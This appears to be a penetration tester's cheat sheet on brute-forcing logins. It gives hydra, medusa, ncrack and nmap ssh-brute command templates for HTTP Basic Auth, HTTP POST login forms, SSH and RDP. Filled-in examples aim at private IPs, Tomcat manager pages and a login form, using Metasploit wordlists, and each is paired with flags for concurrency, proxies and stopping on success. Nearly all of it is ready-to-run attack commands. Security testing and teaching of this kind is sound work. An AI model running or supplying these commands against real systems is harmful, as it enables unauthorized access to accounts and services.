http-default-accounts: Tests for access with default credentials used by a variety of web applications and devices.
By default, Nikto identifies default credentials in some common HTTP/HTTPS services (ex. Apache Tomcat)
Web applications using Basic Authentication send user credentials in a request header with the following format:
Authorization: Basic base64(username:password)
Tip: ncrack appears to be the fastest, although any of the below tools work fine
hydra -l/-L [USERNAME]/[USERNAME_FILE] -p/-P [PASSWORD]/[PASSWORD_FILE] "http-get://[IP_ADDRESS]:[PORT][URL_PATH]"
hydra -l/-L [USERNAME]/[USERNAME_FILE] -p/-P [PASSWORD]/[PASSWORD_FILE] "https-get://[IP_ADDRESS]:[PORT][URL_PATH]"
hydra -L userpass.txt -P userpass.txt "http-get://192.168.205.172:8080/manager/html"
-C [FILE]: file with user:pass combinations to try, instead of specifying separately
-M [FILE]: file containing multiple targets to attack
-S: connect using SSL/TLS
-O: connect using old SSLv3 and SSLv2
-U [module]: print additional options for specific module
-f: stop testing against current host when working credentials are found on current host
-F: stop testing against all hosts when working credentials are found on any host
Set HYDRA_PROXY_HTTP environment variable (for HTTP proxy):
export HYDRA_PROXY_HTTP=http://login:pass@proxy_host:proxy_port
Set HYDRA_PROXY environment variable (for all proxies):
export HYDRA_PROXY=socks5://login:pass@proxy_host:proxy_port
medusa -h/-H [HOST]/[HOSTS_FILE] -u/-U [USERNAME]/[USERNAME_FILE] -p/-P [PASSWORD]/[PASSWORD_FILE] -n [PORT] -M http -m DIR:[URL_PATH]
medusa -h/-H [HOST]/[HOSTS_FILE] -u/-U [USERNAME]/[USERNAME_FILE] -p/-P [PASSWORD]/[PASSWORD_FILE] -n [PORT] -s -M http -m DIR:[URL_PATH]
medusa -h 192.168.32.245 -U userpass.txt -P userpass.txt -n 8080 -M http -m DIR:/manager/html
-C [FILE]: file with user:pass or host:user:pass combinations to try, instead of specifying separately
-t [NUM]: number of logins to be tested concurrently
-T [NUM]: number of hosts to be tested concurrently
-f: stop testing against current host when working credentials are found on current host
-F: stop testing against all hosts when working credentials are found on any host
-b: do not display startup banner
-v [NUM]: set verbosity level to [NUM]. Default medusa output is very verbose (every login attempt is printed), so this can be used for cleaner screenshots
"-v 4" will only print successful attempts
ncrack --user/-U [USERNAME]/[USERNAME_FILE] --pass/-P [PASSWORD]/[PASSWORD_FILE] http://[IP_ADDRESS]:[PORT] -m http:path=[URL_PATH]
[USERNAME] and [PASSWORD] can also be comma-separated lists
ncrack --user/-U [USERNAME]/[USERNAME_FILE] --pass/-P [PASSWORD]/[PASSWORD_FILE] https://[IP_ADDRESS]:[PORT] -m https:path=[URL_PATH]
[USERNAME] and [PASSWORD] can also be comma-separated lists
ncrack -U userpass.txt -P userpass.txt https://192.168.57.2:8443 -m http:path=/manager/html
-f: Stop all testing when working credentials are found on any host
-v: verbose output
-vv: very verbose output
Web applications using login forms send user credentials using body parameters in a POST request (using the content-type "application/x-www-form-urlencoded")
Tip: Intercept a login request in Burp Suite in order to identify the target URL, POST data, and any other information.
hydra -l/-L [USERNAME]/[USERNAME_FILE] -p/-P [PASSWORD]/[PASSWORD_FILE] "http-post-form://[IP_ADDRESS]:[PORT][TARGET_URL_PATH]:[POST_DATA]:[FAILED_LOGIN_STRING]"
- [POST_DATA]: Request body contents, fill in insertion points for usernames with ^USER^ and passwords with ^PASS^.
- [FAILED_LOGIN_STRING]: String encountered in responses when login fails
hydra -l/-L [USERNAME]/[USERNAME_FILE] -p/-P [PASSWORD]/[PASSWORD_FILE] "https-post-form://[IP_ADDRESS]:[PORT][TARGET_URL_PATH]:[POST_DATA]:[FAILED_LOGIN_STRING]"
- [POST_DATA]: Request body contents, fill in insertion points for usernames with ^USER^ and passwords with ^PASS^.
- [FAILED_LOGIN_STRING]: String encountered in responses when login fails
hydra -L /usr/share/wordlists/metasploit/mirai_user.txt -P /usr/share/wordlists/metasploit/mirai_user.txt "http-post-form://192.168.88.20:8887/login:username=^USER^&password=^PASS^&LocalAuth=No&LocalAuthWithDomain=No&loginButton=Login:Username or Password is incorrect"
-C [FILE]: file with user:pass combinations to try, instead of specifying separately
-M [FILE]: file containing multiple targets to attack
-S: connect using SSL/TLS
-O: connect using old SSLv3 and SSLv2
-U [module]: print additional options for specific module
-f: stop testing against current host when working credentials are found on current host
-F: stop testing against all hosts when working credentials are found on any host
Set HYDRA_PROXY_HTTP environment variable (for HTTP proxy):
export HYDRA_PROXY_HTTP=http://login:pass@proxy_host:proxy_port
Set HYDRA_PROXY environment variable (for all proxies):
export HYDRA_PROXY=socks5://login:pass@proxy_host:proxy_port
Intruder in Burp Suite Free Version is VERY slow, so this method should be avoided in favor of faster methods.
- piata_ssh_userpass.txt (Provided by the Metasploit Framework: /usr/share/wordlists/metasploit/piata_ssh_userpass.txt)
medusa -h/-H [HOST]/[HOSTS_FILE] -u/-U [USERNAME]/[USERNAME_FILE] -p/-P [PASSWORD]/[PASSWORD_FILE] -M ssh
-C [FILE]: file with user:pass or host:user:pass combinations to try, instead of specifying separately (any of the three options can be blank per line)
-t [NUM]: number of logins to be tested concurrently
-T [NUM]: number of hosts to be tested concurrently
-f: stop testing against current host when working credentials are found on current host
-F: stop testing against all hosts when working credentials are found on any host
-b: do not display startup banner
-v [NUM]: set verbosity level to [NUM]; Default medusa output is very verbose (every login attempt is printed), so this can be used for cleaner screenshots
"-v 4" will only print successful attempts
ncrack --user/-U [USERNAME]/[USERNAME_FILE] --pass/-P [PASSWORD]/[PASSWORD_FILE] ssh://[HOST]:[PORT]
nmap -p22 -sS -Pn --script ssh-brute --script-args "userdb=[USER_LIST_FILE],passdb=[PASSWORD_LIST_FILE]" [HOST]
brute.useraspass: try username as password for each username
RDP password cracking is VERY SLOW, and should not be relied upon if there are other penetration options available.
ncrack --user/-U [USERNAME]/[USERNAME_FILE] --pass/-P [PASSWORD]/[PASSWORD_FILE] rdp://[HOST],CL=1